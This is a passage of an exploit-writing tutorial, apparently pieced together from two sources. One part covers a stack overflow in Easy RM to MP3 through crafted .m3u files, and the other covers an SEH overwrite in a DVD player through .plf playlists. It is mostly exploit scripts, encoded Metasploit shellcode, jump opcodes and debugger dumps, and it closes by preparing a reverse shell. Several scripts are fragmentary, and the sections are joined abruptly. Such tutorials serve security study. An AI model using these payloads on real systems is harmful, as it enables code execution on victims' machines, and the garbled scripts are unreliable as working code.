dll’s because that would increase the chances on building a reliable exploit across windows
platforms/versions… But you still need to make sure the dll’s use the same base addresses
every time. Sometimes, the dll’s get rebased and in that scenario it could be better to use one
of the os dll’s (user32.dll or kernel32.dll for example)
Open Easy RM to MP3 (don’t open a file or anything) and then attach windbg to the running
process.
Windbg will show the loaded modules, both OS modules and application modules. (Look at the
top of the windbg output, and find the lines that start with ModLoad).
you can show the image base of a dll by running dumpbin.exe (from Visual Studio) with
parameter /headers against the dll. This will allow you to define the lower and upper address
for searches.
You should try to avoid using addresses that contain null bytes (because it would make the
exploit harder… not impossible, just harder.)
Ok, we can jump to ESP+8 now. In that location we need to put the address to jmp esp
(because, as explained before, the ret instruction will take the address from that location and
put it in EIP. At that point, the ESP address will point to our shellcode which is located right
after the jmp esp address… so what we really want at that point is a jmp esp)
From part 1 of the tutorial, we have learned that 0x01ccf23a refers to jmp esp.
Ok, let’s go back to our perl script and replace the “BBBB” (used to overwrite EIP with) with
one of the 3 pop,pop,ret addresses, followed by 8 bytes (NOP) (to simulate that the shellcode
is 8 bytes off from the top of the stack), then the jmp esp address, and then the shellcode.
[AAAAAAAAAAA...AA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcod
e]
(=POPPOPRET)
2 : POP POP RET is executed. EIP gets overwritten with 0x01ccf23a (because that is the address
that was found at ESP+0x8). ESP now points to shellcode.
3 : Since EIP is overwritten with address to jmp esp, the second jump is executed and the
shellcode is launched.
----------------------------------
| |(1)
| |
| | V
[AAAAAAAAAAA...AA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcod
e]
(=POPPOPRET) | | (2)
|------|
We’ll simulate this with a break and some NOP’s as shellcode, so we can see if our jumps work
fine.
my $file= "test1.m3u";
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
(d08.384): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff72b:
000ff73c cc int 3
0:000> d esp
Cool. that worked. Now let’s replace the NOPs after jmp esp (ESP+8) with real shellcode (some
nops to be sure + shellcode, encoded with alpha_upper) (execute calc):
my $file= "test1.m3u";
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
close($FILE);
pwned !
push return
push ret is somewhat similar to call [reg]. If one of the registers is directly pointing at your
shellcode, and if for some reason you cannot use a jmp [reg] to jump to the shellcode, then
you could
• put the address of that register on the stack. It will sit on top of the stack.
• ret (which will take that address back from the stack and jump to it)
In order to make this work, you need to overwrite EIP with the address of a push [reg] + ret
sequence in one of the dll’s.
Suppose the shellcode is located directly at ESP. You need to find the opcode for ‘push
esp’ and the opcode for ‘ret’ first
0:000> a
push esp
000ff7af ret
ret
0:000> u 000ff7ae
+0xff79d:
000ff7af c3 ret
my $file= "test1.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
pwned again !
jmp [reg]+[offset]
Another technique to overcome the problem that the shellcode begins at an offset of a
register (ESP in our example) is by trying to find a jmp [reg + offset] instruction (and
overwriting EIP with the address of that instruction). Let’s assume that we need to jump 8
bytes again (see previous exercise). Using the jmp reg+offset technique, we would simply jump
over the 8 bytes at the beginning of ESP and land directly at our shellcode.
We need to do 3 things :
0:014> a
jmp [esp + 8]
7c901212
0:014> u 7c90120e
ntdll!DbgBreakPoint:
Now you can search for a dll that has this opcode, and use the address to overwrite EIP
with. In our example, I could not find this exact opcode anywhere. Of course, you are not
limited to looking for jmp [esp+8]… you could also look for values bigger than 8 (because you
control anything above 8… you could easily put some additional NOP’s at the beginning of the
shellcode and make the jump into the nop’s…
(by the way: Opcode for ret is c3. But I’m sure you’ve already figured that our for yourself)
Blind return
• When the ret is execute, the last added 4 bytes (topmost value) are popped from the
stack and will be put in EIP
• you cannot point EIP to go a register directly (because you cannot use jmp or call
instructions. (This means that you need to hardcode the memory address of the start
of the shellcode), but
• you can control the data at ESP (at least the first 4 bytes)
In order to set this up, you need to have the memory address of the shellcode (= the address
of ESP). As usual, try to avoid that this address starts with / contains null bytes, or you will not
be able to load your shellcode behind EIP. If your shellcode can be put at a location, and this
location address does not contain a null byte, then this would be another working technique.
Set the first 4 bytes of the shellcode (first 4 bytes of ESP) to the address where the shellcode
begins, and overwrite EIP with the address of the ‘ret’ instruction. From the tests we have
done in the first part of this tutorial, we remember that ESP seems to start at 0x000ff730. Of
course this address could change on different systems, but if you have no other way than
hardcoding addresses, then this is the only thing you can do.
This address contains null byte, so when building the payload, we create a buffer that looks
like this :
The problem with this example is that the address used to overwrite EIP contains a null byte.
(= string terminator), so the shellcode is not put in ESP. This is a problem, but it may not be a
showstopper. Sometimes you can find your buffer (look at the first 26094 A’s, not at the ones
that are pushed after overwriting EIP, because they will be unusable because of null byte) back
at other locations/registers, such as eax, ebx, ecx, etc… In that case, you could try to put the
address of that register as the first 4 bytes of the shellcode (at the beginning of ESP, so directly
after overwriting EIP), and still overwrite EIP with the address of a ‘ret’ instruction.
This is a technique that has a lot of requirements and drawbacks, but it only requires a “ret”
instruction… Anyways, it didn’t really work for Easy RM to MP3.
Dealing with small buffers : jumping anywhere with custom jumpcode
We have talked about various ways to make EIP jump to our shellcode. In all scenario’s, we
have had the luxury to be able to put this shellcode in one piece in the buffer. But what if we
see that we don’t have enough space to host the entire shellcode ?
In our exercise, we have been using 26094 bytes before overwriting EIP, and we have noticed
that ESP points to 26094+4 bytes, and that we have plenty of space from that point forward.
But what if we only had 50 bytes (ESP -> ESP+50 bytes). What if our tests showed that
everything that was written after those 50 bytes were not usable ? 50 bytes for hosting
shellcode is not a lot. So we need to find a way around that. So perhaps we can use the 26094
bytes that were used to trigger the actual overflow.
First, we need to find these 26094 bytes somewhere in memory. If we cannot find them
anywhere, it’s going to be difficult to reference them. In fact, if we can find these bytes and
find out that we have another register pointing (or almost pointing) at these bytes, it may even
be quite easy to put our shellcode in there.
If you run some basic tests against Easy RM to MP3, you will notice that parts of the 26094
bytes are also visible in the ESP dump :
my $file= "test1.m3u";
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
open($FILE,">$file");
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
We can see our 50 X’s at ESP. Let’s pretend this is the only space available for shellcode (we
think). However, when we look further down the stack, we can find back A’s starting from
address 000ff849 (=ESP+281).
When we look at other registers, there’s no trace of X’s or A’s. (You can just dump the
registers, or look for a number of A’s in memory.
So this is it. We can jump to ESP to execute some code, but we only have 50 bytes to spend on
shellcode. We also see other parts of our buffer at a lower position in the stack… in fact, when
we continue to dump the contents of ESP, we have a huge buffer filled with A’s…
Luckily there is a way to host the shellcode in the A’s and use the X’s to jump to the A’s. In
order to make this happen, we need a couple of things
• The position inside the buffer with 26094 A’s that is now part of ESP, at 000ff849
(“Where do the A’s shown in ESP really start ?) (so if we want to put our shellcode
inside the A’s, we need to know where exactly it needs to be put)
• “Jumpcode” : code that will make the jump from the X’s to the A’s. This code cannot
be larger than 50 bytes (because that’s all we have available directly at ESP)
We can find the exact position by using guesswork, by using custom patterns, or by using one
of metasploits patterns.
We’ll use one of metasploit’s patterns… we’ll start with a small one (so if we are looking at the
start of the A’s, then we would not have to work with large amount of character patterns :-) )
Generate a pattern of let’s say 1000 characters, and replace the first 1000 characters in the
perl script with the pattern (and then add 25101 A’s)
my $file= "test1.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa....g8Bg9Bh0Bh1Bh2B";
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available at ESP
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data in
the ESP dump
open($FILE,">$file");
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
What we see at 000ff849 is definitely part of the pattern. The first 4 characters are 5Ai6
Using metasploit pattern_offset utility, we see that these 4 characters are at offset 257. So
instead of putting 26094 A’s in the file, we’ll put 257 A’s, then our shellcode, and fill up the rest
of the 26094 characters with A’s again. Or even better, we’ll start with only 250 A’s, then 50
NOP’s, then our shellcode, and then fill up the rest with A’s. That way, we don’t have to be
very specific when jumping… If we can land in the NOP’s before the shellcode, it will work just
fine.
Let’s see how the script and stack look like when we set this up :
my $file= "test1.m3u";
my $buffersize = 26094;
my $shellcode = "\xcc";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop2 = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
When the application dies, we can see our 50 NOPs starting at 000ff848, followed by the
shellcode (0x90 at 000ff874), and then again followed by the A’s. Ok, that looks fine.
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
The second thing we need to do is build our jumpcode that needs to be placed at ESP. The goal
of the jumpcode is to jump to ESP+281
Writing jump code is as easy as writing down the required statements in assembly and then
translating them to opcode (making sure that we don’t have any null bytes or other restricted
characters at the same time) :-)
Jumping to ESP+281 would require : Add 281 to the ESP register, and then perform jump esp.
281 = 119h. Don’t try to add everything in one shot, or you may end up with opcode that
contains null bytes.
Since we have some flexibility (due to the NOP’s before our shellcode), we don’t have to be
very precise either. As long as we add 281 (or more), it will work. We have 50 bytes for our
jumpcode, but that should not be a problem.
Let’s add 0x5e (94) to esp, 3 times. Then do the jump to esp. The assembly commands are :
• add esp,0x5e
• add esp,0x5e
• add esp,0x5e
• jmp esp
0:014> a
add esp,0x5e
add esp,0x5e
add esp,0x5e
jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
my $file= "test1.m3u";
my $buffersize = 26094;
my $eip = "BBBB";
my $preshellcode = "X" x 4;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
The jumpcode is perfectly placed at ESP. When the shellcode is called, ESP would point into
the NOPs (between 00ff842 and 000ff873). Shellcode starts at 000ff874
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
The last thing we need to do is overwrite EIP with a “jmp esp”. From part 1 of the tutorial, we
know that this can be achieved via address 0x01ccf23a
• EIP will be overwritten with 0x01ccf23a (points to a dll, run “JMP ESP”)
• The data after overwriting EIP will be overwritten with jump code that adds 282 to ESP
and then jumps to that address.
• After the payload is sent, EIP will jump to esp. This will triggger the jump code to jump
to ESP+282. Nop sled, and shellcode gets executed.
my $file= "test1.m3u";
my $buffersize = 26094;
my $preshellcode = "X" x 4;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
The generated m3u file will bring us right at our shellcode (which is a break). (EIP = 0x000ff874
= begin of shellcode )
(d5c.c64): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff863:
000ff874 cc int 3
0:000> d esp
Replace the break with some real shellcode (and replace the A’s with NOPs)… (shellcode :
excluded characters 0x00, 0xff, 0xac, 0xca)
When you replace the A’s with NOPs, you’ll have more space to jump into, so we can live with
jumpcode that only jumps 188 positions further (2 times 5e)
my $file= "test1.m3u";
my $buffersize = 26094;
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode = "\x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" .
"\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a" .
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46" .
"\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45" .
"\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c" .
"\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c" .
"\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46" .
"\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50" .
"\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
"\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44" .
"\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45" .
"\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b" .
"\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43" .
"\x51\x42\x4c\x45\x33\x45\x50\x41\x41";
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
• popad
the “popap” instruction may help us ‘jumping’ to our shellcode as well. popad (pop all double)
will pop double words from the stack (ESP) into the general-purpose registers, in one action.
The registers are loaded in the following order : EDI, ESI, EBP, EBX, EDX, ECX and EAX. As a
result, the ESP register is incremented after each register is loaded (triggered by the popad).
One popad will thus take 32 bytes from ESP and pops them in the registers in an orderly
fashion.
So suppose you need to jump 40 bytes, and you only have a couple of bytes to make the jump,
you can issue 2 popad’s to point ESP to the shellcode (which starts with NOPs to make up for
the (2 times 32 bytes – 40 bytes of space that we need to jump over))
Let’s use the Easy RM to MP3 vulnerability again to demonstrate this technique :
We’ll reuse one of the script example from earlier in this post, and we’ll build a fake buffer that
will put 13 X’s at ESP, then we’ll pretend there is some garbage (D’s and A’s) and then place to
put our shellcode (NOPS + A’s)
my $file= "test1.m3u";
my $buffersize = 26094;
my $shellcode = "\xcc";
my $eip = "BBBB";
my $preshellcode = "X" x 17; #let's pretend this is the only space we have available
my $garbage = "\x44" x 100; #let’s pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
Let’s pretend that we need to use the 13 X’s (so 13 bytes) that are available directly at ESP to
jump over 100 D’s (44) and 160 A’s (so a total of 260 bytes) to end up at our shellcode (starts
with NOPs, then a breakpoint, and then A’s (=shellcode))
(so we need to start our shellcode with nops, or start the shellcode at [start of shellcode]+28
bytes
In our case, we have put some nops before the shellcode, so let’s try to “popad” into the nops
and see if the application breaks at our breakpoint.
First, overwrite EIP again with jmp esp. (see one of the previous exploit scripts)
Then, instead of the X’s, perform 9 popad’s, followed by “jmp esp” opcode (0xff,0xe4)
my $file= "test1.m3u";
my $buffersize = 26094;
my $shellcode = "\xcc";
$preshellcode=$preshellcode."\x61" x 9; #9 popads
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
After opening the file, the application does indeed break at the breakpoint. EIP and ESP look
like this :
000ff874 cc int 3
0:000> d eip
0:000> d eip-32
0:000> d esp
=> the popad’s have worked and made esp point at the nops. Then the jump to esp was made
(0xff 0xe4), which made EIP jump to nops, and slide to the breakpoint (at 000f874)
Replace the A’s with real shellcode :
pnwed again !
Another (less preferred, but still possible) way to jump to shellcode is by using jumpcode that
simply jumps to the address (or an offset of a register). Since the addresses/registers could
vary during every program execution, this technique may not work every time.
So, in order to hardcode addresses or offsets of a register, you simply need to find the opcode
that will do the jump, and then use that opcode in the smaller “first”/stage1 buffer, in order to
jump to the real shellcode.
You should know by now how to find the opcode for assembler instructions, so I’ll stick to 2
examples :
1. jump to 0x12345678
0:000> a
jmp 12345678
7c901213
0:000> u 7c90120e
ntdll!DbgBreakPoint:
2. jump to ebx+124h
0:000> a
add ebx,124
jmp ebx
7c90121c
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
=> opcodes are 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx 124h) and 0xff,0xe3 (jmp ebx)
In the event you need to jump over just a few bytes, then you can use a couple ‘short jump’
techniques to accomplish this :
– a conditional (short/near) jump : (“jump if condition is met”) : This technique is based on the
states of one or more of the status flags in the EFLAGS register (CF,OF,PF,SF and ZF). If the
flags are in the specified state (condition), then a jump can be made to the target instruction
specified by the destination operand. This target instruction is specified with a relative offset
(relative to the current value of EIP).
Example : suppose you want to jump 6 bytes : Have a look at the flags (ollydbg), and depending
on the flag status, you can use one of the opcodes below
Let’s say the Zero flag is 1, then you can use opcode 0x74, followed by the number of bytes
you want to jump (0x06 in our case)
77 cb JNBE rel8 Jump short if not below or equal (CF=0 and ZF=0)
7F cb JNLE rel8 Jump short if not less or equal (ZF=0 and SF=OF)
0F 87 cw/cd JNBE rel16/32 Jump near if not below or equal (CF=0 and ZF=0)
0F 8F cw/cd JNLE rel16/32 Jump near if not less or equal (ZF=0 and SF=OF)
As you can see in the table, you can also do a short jump based on register ECX being
zero. One of the Windows SEH protections (see part 3 of the tutorial series) that have been
put in place is the fact that registers are cleared when an exception occurs. So sometimes you
will even be able to use 0xe3 as jump opcode (if ECX = 00000000)
Note : You can find more/other information about making 2 byte jumps (forward and
backward/negative jumps) at http://thestarman.narod.ru/asm/2bytejumps.htm
Backward jumps
In the event you need to perform backward jumps (jump with a negative offset) : get the
negative number and convert it to hex. Take the dword hex value and use that as argument to
a jump (\xeb or \xe9)
Exampe : jump back 400 bytes : -400 = FFFFFE70, so jump -400 bytes =
"\xe9\x70\xfe\xff\xff" (as you can see, this opcode is 5 bytes long. Sometimes (if you need to
stay within a dword size (4 byte limit), then you may need to perform multiple shorter jumps in
order to get where you want to be)
Like I said in "Part 1" I think its important to keep things as difficult or simple as they need to
be so I won't be explaining SEH in full technical detail, but I’ll give you enough info to get going
with. I highly advise you do some more in-depth research online. The SEH is a mechanism in
Windows that makes use of a data structure called "Linked List" which contains a sequence of
data records. When a exception is triggered the operating system will travel down this list. The
exception handler can either evaluate it is suitable to handle the exception or it can tell the
operating system to continue down the list and evaluate the other exception functions. To be
able to do this the exception handler needs to contain two elements (1) a pointer to the
current “Exception Registration Record” (SEH) and (2) a pointer to the “Next Exception
Registration Record” (nSEH). Since our Windows stack grows downward we will see that the
order of these records is reversed [nSEH]...[SEH]. When a exception occurs in a program
function the exception handler will push the elements of it's structure to the stack since this is
part of the function prologue to execute the exception. At the time of the exception the SEH
will be located at esp+8.
Your probably asking yourself what does all of this have to do with exploit development. If we
get a program to store a overly long buffer AND we overwrite a “Structured Exception
Handler” windows will zero out the CPU registers so we won't be able to directly jump to our
shellcode. Luckily this protection mechanism is flawed. Generally what we will want to do is
overwrite SEH with a pointer to a “POP POP RETN” instruction (the POP instruction will remove
4-bytes from the top of the stack and the RETN instruction will return execution to the top of
the stack). Remember that the SEH is located at esp+8 so if we increment the stack with 8-
bytes and return to the new pointer at the top of the stack we will then be executing nSEH. We
then have at least 4-bytes room at nSEH to write some opcode that will jump to an area of
memory that we control where we can place our shellcode!!
This all sounds terribly complicated but you'll see it's all in the wording, actually creating a
SEH exploit is exceedingly easy, the example below will demonstrate this.
Ok so below you can see our POC skeleton exploit; this is a fileformat exploit. We will be
writing a long buffer to a playlist file (*.plf) which will then be read by the DVD player and
cause a buffer overflow (this is really not that different from sending a buffer over a TCP or
UDP connection). The only salient point here is that the “victim” needs to be tricked into
opening our playlist hehe.
#!/usr/bin/python -w
filename="evil.plf"
buffer = "A"*2000
textfile.write(buffer)
textfile.close()
Ok so we create the *.plf, attach the player to immunity debugger and open the playlist file.
The player crashes as expected, we pass the initial exception with “Shift-F9” (we do this
because this initial exception leads to a different exploitation technique and we are interested
in the SEH). You can see a screenshot of the CPU registers below (you will notice that the SEH
has zeroed out several registers) and a screenshot of the SEH-chain which shows us that we do
overwrite the SEH record.
Registers
SEH-Chain
The next step should be no surprise, we need to analyze the crash so we replace our initial
buffer with the metasploit pattern (paying attention to keep the same buffer length).
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
[...snip...]
f5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0
Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj
0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8
Cl9Cm0Cm1Cm2Cm3Cm4Cm5
Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
After we recreate our *.plf file and crash the program we can have mona analyze the crash.
You can see the screenshot of that analysis below. What we are particularly interested in are
the bytes that overwrite the SEH-record, mona indicates that these bytes are the 4-bytes that
directly follow after the first 612-bytes of our buffer.
!mona findmsp
Metasploit Pattern
Ok so far so good, based on this information we can reconstruct our buffer as shown below.
We will be allocating 4-bytes for nSEH which should be placed directly before SEH which also
takes up 4-bytes.
Remember we need to overwrite SEH with a pointer to POP POP RETN, once again mona
comes to the rescue! The command shown below will search for all valid pointers. It is worth
mentioning that mona already filters out pointers that might potentially be problematic like
pointers from SafeSEH modules, I suggest you have a look at the documentation be get a
better grasp of the available options to filter the results. You can see the results in the
screenshot.
!mona seh
PPR Pointer
Most of these pointers will do, just keep in mind that they can't contain any badcharacters.
Personally I didn't select any of the ones that are visible in the log screen simply because I
wanted a clean return instead of a retern+offset. Since mona found 2968 valid pointers there
are many to chose from just check out “seh.txt” in the immunity debugger installation folder.
Keep in mind that we need to reverse the byte order due to the Little Endian architecture of
the CPU. Observe the syntax below.
For the moment we will leave nSEH the way it is, in a moment we will have a look in the
debugger to see what value we should fill in there. Notice that our POP POP RETN instruction is
taken from “EPG.dll” which belongs to the DVD player, that means that our exploit will be
portable acros different operating systems!! Our new POC should look like this...
#!/usr/bin/python -w
filename="evil.plf"
#---------------------------------------------------------------------------#
# #
#---------------------------------------------------------------------------#
buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384
textfile.write(buffer)
textfile.close()
Ok lets recreate our new *.plf file and put a breakpoint on our SEH pointer in the debugger.
After passing the first exception with Shift-F9 we hit our breakpoint. You can see the
screenshot below.
Breakpoint
Perfect!! If we step through these three instructions with F7 the RETN instruction will bring us
back the our “B”*4 (nSEH). We can see that the pointer we put in SEH has been converted to
opcode and after that we have our “D”*1384 which can be used for our shellcode. All that
remains is to write some opcode in nSHE which will make a short jump forward into our “D”'s,
we can do this live in the debugger, observe the screenshots below.
nSEH
Assemble jmp
jmp opcode
Ok so that’s a pretty neat trick since we now know which opcode we need to put in nSEH to
jump to our buffer. We need to jump forward at least 6-bytes. Our new buffer should look like
this:
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "D"*1384
The serious work is done. We need to (1) make room for our shellcode and (2) generate a
payload to insert in our exploit. Again like in the previous part we want to have our buffer
space calculated dynamically so we can easily exchange the shellcode if we want to. You can
see the result below. Any shellcode that we insert in the shellcode variable will get executed
by our buffer overflow.
#!/usr/bin/python -w
filename="evil.plf"
shellcode = (
#----------------------------------------------------------------------------------#
# #
#----------------------------------------------------------------------------------#
# \----------------> #
# \--------------------------------------> #
# <-------/ #
# (2) nSEH jumps over SEH and redirects execution to our B's #
# (3) We place our shellcode here ... Game Over! #
#----------------------------------------------------------------------------------#
textfile.write(buffer)
textfile.close()
Ok time to generate some shellcode. For the sake of diversity I'll be using a reverse shell...
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows
Speech API
[...snip...]
